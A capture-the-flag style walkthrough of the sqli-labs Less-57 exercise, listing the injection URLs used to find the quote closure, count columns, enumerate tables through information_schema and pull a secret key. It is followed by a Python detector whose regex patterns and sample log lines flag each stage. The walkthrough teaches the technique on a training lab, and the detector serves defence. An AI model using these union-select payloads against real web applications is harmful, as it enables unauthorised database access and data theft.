sqli-labs (less-57)


Open Less-57 and submit id=1.
We get 14 attempts here.

http://127.0.0.1/sql1/Less-57/?id=1' #page displays normally
http://127.0.0.1/sql1/Less-57/?id=1" #page shows an error
http://127.0.0.1/sql1/Less-57/?id=1"--+ #page displays normally

So the closure is "--+ (a double quote, with --+ commenting out the rest of the query), and this is a string-type injection.

Determine the number of columns

http://127.0.0.1/sql1/Less-57/?id=1" order by 3--+ #output displays normally
http://127.0.0.1/sql1/Less-57/?id=1" order by 4--+ #output shows an error

The number of columns is 3.

Find which column positions are echoed back in the page

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,3--+

View the current database

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,database()--+

List all tables in the challenges database

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

List all columns of the ibbbmxmsou table

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='ibbbmxmsou')--+

View the values in the secret_5JP3 column

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,(select group_concat(secret_5JP3) from challenges.ibbbmxmsou)--+

Submit the retrieved KEY.
Success.
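
From the defender's side, the request sequence in this walkthrough (quote probe, `order by` column count, `union select`, `information_schema` lookup) leaves a recognizable trail in the web server's access log. The Python detector below is an added example, not part of the original post or of sqli-labs; the log lines are constructed, and the stage names and function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

def _line(query):  # constructed Apache-style access log line (sample data)
    return ('127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET /sql1/Less-57/?id={query} HTTP/1.1" 200 700')

SAMPLE_LOG = [_line(q) for q in (
    "1", "1%22", "1%22--+", "1%22%20order%20by%204--+",
    "-1%22%20union%20select%201,2,database()--+",
    "-1%22%20union%20select%201,2,(select%20group_concat(table_name)"
    "%20from%20information_schema.tables%20where%20table_schema=%27challenges%27)--+",
)]

# Heuristic patterns, ordered from most to least specific; first match wins.
STAGES = [
    ("schema-enumeration", re.compile(r"\binformation_schema\b")),
    ("union-extraction", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+")),
    ("quote-probe", re.compile(r"""['"]\s*(--|#|$)""")),
]

def classify(value):
    """Return the stage name for one URL-decoded parameter value, or None."""
    text = re.sub(r"/\*.*?\*/", " ", value.lower())  # inline comments -> space
    text = re.sub(r"\s+", " ", text).strip()
    for stage, pattern in STAGES:
        if pattern.search(text):
            return stage
    return None

def scan(log_lines, param="id"):
    """Yield (client, stage, decoded value) for each suspicious request."""
    for line in log_lines:
        m = re.match(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes and turns '+' into a space, as the server does
        for value in parse_qs(urlsplit(target).query).get(param, []):
            stage = classify(value)
            if stage:
                yield client, stage, value

def progression(log_lines):
    """Map each client to the ordered, de-duplicated stages it reached."""
    seen = {}
    for client, stage, _ in scan(log_lines):
        if stage not in seen.setdefault(client, []):
            seen[client].append(stage)
    return seen
```

A single client moving through several of these stages in order is a much stronger signal than any one pattern on its own, so `progression()` is the result worth alerting on.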
